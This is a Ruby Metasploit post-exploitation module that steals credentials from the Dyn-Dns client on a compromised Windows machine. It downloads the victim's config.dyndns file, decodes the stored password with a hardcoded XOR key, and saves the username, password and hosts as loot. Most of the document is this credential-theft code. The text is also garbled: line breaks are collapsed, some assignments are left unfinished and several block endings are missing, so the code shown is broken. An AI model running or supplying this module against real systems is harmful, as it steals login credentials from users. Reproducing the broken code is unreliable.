## #$Id$ ##
## # This file is part of the Metasploit
Framework and may be subject to # redistribution and commercial
restrictions. Please see the Metasploit # Framework web site for
more information on licensing and terms of use. #
http://metasploit.com/framework/ ##
require 'msf/core'
class Metasploit3 < Msf::Post
def initialize(info={})
super(update_info(info, 'Name' => 'Windows Gather Dyn-Dns Client
Password Extractor', 'Description' => %q{ This module extracts
the username, password, and hosts for Dyn-Dns version 4.1.8. This
is done by downloading the config.dyndns file from the victim
machine, and then automatically decode the password field. The
original copy of the config file is also saved to disk. },
'License' => MSF_LICENSE, 'Author' => [ 'Shubham Dawra
<shubham2dawra[at]gmail.com>', #SecurityXploded.com 'sinn3r',
#Lots of code rewrite ], 'Version' => '$Revision$',
'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ]
)) end
# # Search for the config file. # Return
the config file path, otherwise nil to indicate nothing was found
# def get_config_file config_paths = [
"C:\\ProgramData\\Dyn\\Updater\\", #Vista "C:\\Documents and
Settings\\All Users\\Application Data\\Dyn\\Updater\\" #XP and else
# Give me the first match config_file = nil
config_paths.each do |p| tmp_path = p + "config.dyndns" begin
f = session.fs.file.stat(tmp_path) config_file = tmp_path
break #We've found a valid one, break! rescue end end
return config_file end
# # Download the config
file, and then load it up in memory. # Return the content. #
def load_config_file(config_file) f =
session.fs.file.new(config_file, "rb") content = '' until
f.eof? content << f.read end p = store_loot("dyndns.raw",
"text/plain", session.tunnel_peer, "dyndns_raw_config.dyndns")
vprint_status("Raw config file saved: #{p.to_s}") return content
# # Parse the data # Return: Hash { :username,
:pass, :hosts } # def parse_config(content) # Look at each
line for user/pass/host config_data = {} user =
content.scan(/Username=([\x21-\x7e]+)/)[0][0] pass =
content.scan(/Password=([\x21-\x7e]+)/)[0][0] host =
# Let's decode the
pass pass = decode_password(pass) if not pass.nil?
# Store
data in a hash, save it to the array # Might contain nil if
nothing was regexed config_data = { :user => user, :pass =>
pass, :hosts => host }
return config_data end
# # Decode the password # def decode_password(pass)
pass = [pass].pack('H*') s = '' c = 0
pass.each_byte do
|a1| a2 = "t6KzXhCh"[c, 1].unpack('c')[0].to_i s << (a1 ^
a2).chr c = ((c+1)%8) end
return s end
# Print results and storeloot # def do_report(data) tbl =
Rex::Ui::Text::Table.new( 'Header' => 'DynDNS Client Data',
'Indent' => 1, 'Columns' => ['Field', 'Value'] )
Store username/password tbl << ['Username', data[:user]] tbl
<< ['Password', data[:pass]]
# Store all found hosts hosts
= data[:hosts] hosts.each do |host| tbl << ['Host', host]
if not tbl.rows.empty? p
= store_loot( 'dyndns.data', 'text/plain', session, tbl,
'dyndns_data.txt', 'DynDNS Client Data' )
print_status("Parsed data stored in: #{p.to_s}") end end
# # Main function, duh # def run # Find the
config file config_file = get_config_file if config_file.nil?
print_error("No config file found, will not continue") return
# Load the config file print_status("Downloading
config.dyndns...") content = load_config_file(config_file)
if content.empty? print_error("Config file seems empty, will
not continue") return end
# Get parsed data config =
# Store data do_report(config)